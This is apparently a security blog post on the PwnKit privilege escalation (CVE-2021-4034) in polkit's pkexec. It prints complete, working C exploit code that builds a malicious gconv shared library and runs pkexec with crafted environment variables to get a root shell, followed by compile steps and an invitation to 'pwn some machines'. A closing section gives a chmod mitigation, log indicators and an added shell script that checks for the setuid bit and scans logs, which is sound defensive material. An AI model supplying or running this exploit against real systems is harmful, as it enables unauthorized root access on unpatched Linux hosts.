root💀muzec-sec:~#

Hack. Sleep. Repeat

Description

A local privilege escalation vulnerability was found in polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies. The current version of pkexec doesn't handle the calling-parameter count correctly and ends up trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way that pkexec is induced to execute arbitrary code. When the attack succeeds, it causes a local privilege escalation, giving unprivileged users administrative rights on the target machine.

CVE

CVE-2021-4034

Exploit Code Below:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shell = 
  "#include <stdio.h>\n"
  "#include <stdlib.h>\n"
  "#include <unistd.h>\n\n"
  "void gconv() {}\n"
  "void gconv_init() {\n"
  "  setuid(0); setgid(0);\n"
  "  seteuid(0); setegid(0);\n"
  "  system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
  "  exit(0);\n"
  "}";

int main(int argc, char *argv[]) {
  FILE *fp;
  system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
  system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
  fp = fopen("pwnkit/pwnkit.c", "w");
  fprintf(fp, "%s", shell);
  fclose(fp);
  system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
  char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
  execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}

Exploiting the Target Below:

Save the exploit in a file named exploit.c (or anything you like, as long as it ends in .c). Let's jump in already and get root lol.

┌──(muzec㉿Muzec-Security)-[~]
└─$ pkexec --version                                                                                                                                             127 ⨯
pkexec version 0.105

┌──(muzec㉿Muzec-Security)-[~]
└─$ cat /etc/issue
Kali GNU/Linux Rolling \n \l

┌──(muzec㉿Muzec-Security)-[~]
└─$ uname -a
Linux Muzec-Security 5.10.0-kali4-amd64 #1 SMP Debian 5.10.19-1kali1 (2021-03-03) x86_64 GNU/Linux

┌──(muzec㉿Muzec-Security)-[~]
└─$ lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:        2021.1
Codename:       kali-rolling

┌──(muzec㉿Muzec-Security)-[~]
└─$ nano exploit.c

┌──(muzec㉿Muzec-Security)-[~]
└─$ gcc exploit.c -o exploit

Now that we have compiled it, let's run it and get a shiny root shell.


Awesome right?? Now go ahead and pwn some machines :wink: :wink:

If no patches are available for your Linux distro, as a short-term solution, you can remove the SUID-bit from pkexec:

chmod 0755 /usr/bin/pkexec

Qualys also notes that the exploitation technique leaves traces in logs, that say either “The value for the SHELL variable was not found the /etc/shells file…” or “The value for environment variable … contains suspicious content.”
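As an added, defender-side example (not code from the original post, from polkit, or from Qualys), the following POSIX shell script turns the two notes above into checks: it tests whether pkexec still carries the setuid bit and applies the chmod 0755 mitigation only when explicitly asked, and it counts the two pkexec log messages Qualys describes in a log file. It assumes pkexec lives at /usr/bin/pkexec (the path used on this page) and that pkexec's messages end up in a syslog file such as /var/log/auth.log; the sample log lines are constructed and abbreviated, not copied from a real system.

```shell
#!/bin/sh
# Added defender-side example for CVE-2021-4034; not code from the original
# post, polkit or Qualys. Assumes /usr/bin/pkexec (the path used on this page)
# and that pkexec logs through syslog to a file such as /var/log/auth.log.

PKEXEC="${PKEXEC:-/usr/bin/pkexec}"

# Succeeds (exit 0) when the file exists and carries the setuid bit.
# POSIX test(1) provides -u for exactly this check.
is_setuid() {
  [ -u "$1" ]
}

# The short-term mitigation from the page: drop the setuid bit so pkexec can
# no longer be used to gain root. Must run as root on the real binary, and it
# breaks pkexec's normal job until polkit is patched.
remove_pkexec_suid() {
  chmod 0755 "$1"
}

# Count lines from pkexec carrying either message Qualys notes an attempt
# leaves behind. awk is used so the function exits 0 even with zero hits.
count_pwnkit_log_hits() {
  awk '/pkexec/ && (/was not found the \/etc\/shells file/ || /contains suspicious content/) { n++ } END { print n + 0 }' "$1"
}

# Constructed, abbreviated sample of what such a syslog file could contain.
# Real pkexec lines append further fields after the message text.
sample_log() {
  cat <<'EOF'
Jan 26 10:15:01 kali CRON[2100]: pam_unix(cron:session): session opened for user root
Jan 26 10:16:42 kali pkexec[2143]: The value for the SHELL variable was not found the /etc/shells file
Jan 26 10:16:43 kali pkexec[2144]: The value for environment variable PATH contains suspicious content
Jan 26 10:17:05 kali sudo:    muzec : TTY=pts/0 ; PWD=/home/muzec ; USER=root ; COMMAND=/usr/bin/apt update
EOF
}

# Demo run: scan the constructed sample, then report (without modifying)
# the state of pkexec on this host. Pass --fix to apply the mitigation.
tmp="$(mktemp)"
sample_log > "$tmp"
echo "pwnkit indicators in sample log: $(count_pwnkit_log_hits "$tmp")"
rm -f "$tmp"

if [ -e "$PKEXEC" ]; then
  if is_setuid "$PKEXEC"; then
    if [ "${1:-}" = "--fix" ]; then
      remove_pkexec_suid "$PKEXEC" && echo "setuid bit removed from $PKEXEC"
    else
      echo "$PKEXEC is setuid; patch polkit or run: $0 --fix"
    fi
  else
    echo "$PKEXEC is not setuid (mitigation already applied)"
  fi
else
  echo "$PKEXEC not present on this host"
fi
```

To scan a real file instead of the sample, call count_pwnkit_log_hits on it (for example /var/log/auth.log, or the output of journalctl saved to a file). A non-zero count is worth an incident ticket even on a patched host, since the messages are logged by pkexec's own sanity checks and a patched pkexec still emits them when someone tries.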

Greetings from Muzec
